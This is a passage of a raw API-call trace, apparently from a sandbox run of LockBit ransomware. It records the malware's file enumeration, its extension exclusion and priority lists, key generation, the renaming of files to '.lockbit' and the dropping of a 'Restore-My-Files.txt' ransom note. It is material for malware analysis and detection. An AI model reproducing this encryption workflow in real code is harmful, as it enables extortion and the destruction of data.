(lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.333] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36491500, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x36491500, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x143c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00423_.WMF", cAlternateFileName="")) returned 1 [0175.333] lstrcmpiW (lpString1=".", lpString2="SO00423_.WMF") returned -1 [0175.333] lstrcmpiW (lpString1="..", lpString2="SO00423_.WMF") returned -1 [0175.333] PathFindExtensionW (pszPath="SO00423_.WMF") returned=".WMF" [0175.333] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.333] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.333] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.333] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.333] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.333] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.333] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.333] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.333] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.333] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.333] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.333] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.333] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.333] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.333] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.333] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.334] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.334] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00423_.WMF") returned -1 [0175.335] lstrcmpiW (lpString1="ntldr", lpString2="SO00423_.WMF") returned -1 [0175.335] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00423_.WMF") returned -1 [0175.335] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00423_.WMF") returned -1 [0175.335] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00423_.WMF") returned -1 [0175.335] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00423_.WMF") returned 1 [0175.335] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00423_.WMF") returned -1 [0175.335] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.335] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00423_.WMF") returned=".WMF" [0175.335] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.335] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.335] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.336] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.336] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00423_.WMF.lockbit") returned 72 [0175.336] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00423_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00423_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0175.338] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.338] malloc (_Size=0x40068) returned 0x3df0008 [0175.338] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5180) returned 1 [0175.338] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.338] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.338] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.339] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.339] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.341] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00423_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00423_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.341] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.341] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.342] free (_Block=0x1fa2ed8) [0175.342] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00423_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.342] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.342] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.343] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79ef4f00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79ef4f00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x1544, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00444_.WMF", cAlternateFileName="")) returned 1 [0175.343] lstrcmpiW (lpString1=".", lpString2="SO00444_.WMF") returned -1 [0175.343] lstrcmpiW (lpString1="..", lpString2="SO00444_.WMF") returned -1 [0175.343] PathFindExtensionW (pszPath="SO00444_.WMF") returned=".WMF" [0175.343] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.343] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.343] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.343] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.343] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.343] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.343] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.343] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.343] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.343] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.343] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.343] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.343] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.343] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.343] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.343] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.344] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.344] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00444_.WMF") returned -1 [0175.345] lstrcmpiW (lpString1="ntldr", lpString2="SO00444_.WMF") returned -1 [0175.345] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00444_.WMF") returned -1 [0175.345] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00444_.WMF") returned -1 [0175.345] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00444_.WMF") returned -1 [0175.345] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00444_.WMF") returned 1 [0175.345] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00444_.WMF") returned -1 [0175.345] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.345] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00444_.WMF") returned=".WMF" [0175.345] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.345] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.345] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.346] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.346] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00444_.WMF.lockbit") returned 72 [0175.346] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00444_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0175.347] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.347] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.347] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5444) returned 1 [0175.347] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.348] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.348] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.348] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.348] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.387] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00444_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00444_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.387] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.387] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.388] free (_Block=0x1fa2ed8) [0175.388] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00444_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.388] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.388] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.389] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf630100, ftCreationTime.dwHighDateTime=0x1bd4b2d, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf630100, ftLastWriteTime.dwHighDateTime=0x1bd4b2d, nFileSizeHigh=0x0, nFileSizeLow=0x878, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00452_.WMF", cAlternateFileName="")) returned 1 [0175.389] lstrcmpiW (lpString1=".", lpString2="SO00452_.WMF") returned -1 [0175.389] lstrcmpiW (lpString1="..", lpString2="SO00452_.WMF") returned -1 [0175.389] PathFindExtensionW (pszPath="SO00452_.WMF") returned=".WMF" [0175.389] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.389] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.389] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.389] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.389] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.389] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.389] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.389] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.389] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.389] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.389] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.389] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.389] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.389] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.390] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.390] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.391] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.391] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.391] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.391] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.391] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.391] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.391] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.391] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.391] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.391] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.391] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.391] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.391] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.391] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00452_.WMF") returned -1 [0175.391] lstrcmpiW (lpString1="ntldr", lpString2="SO00452_.WMF") returned -1 [0175.391] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00452_.WMF") returned -1 [0175.391] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00452_.WMF") returned -1 [0175.391] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00452_.WMF") returned -1 [0175.391] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00452_.WMF") returned 1 [0175.391] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00452_.WMF") returned -1 [0175.391] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.392] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00452_.WMF") returned=".WMF" [0175.392] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.392] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.392] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 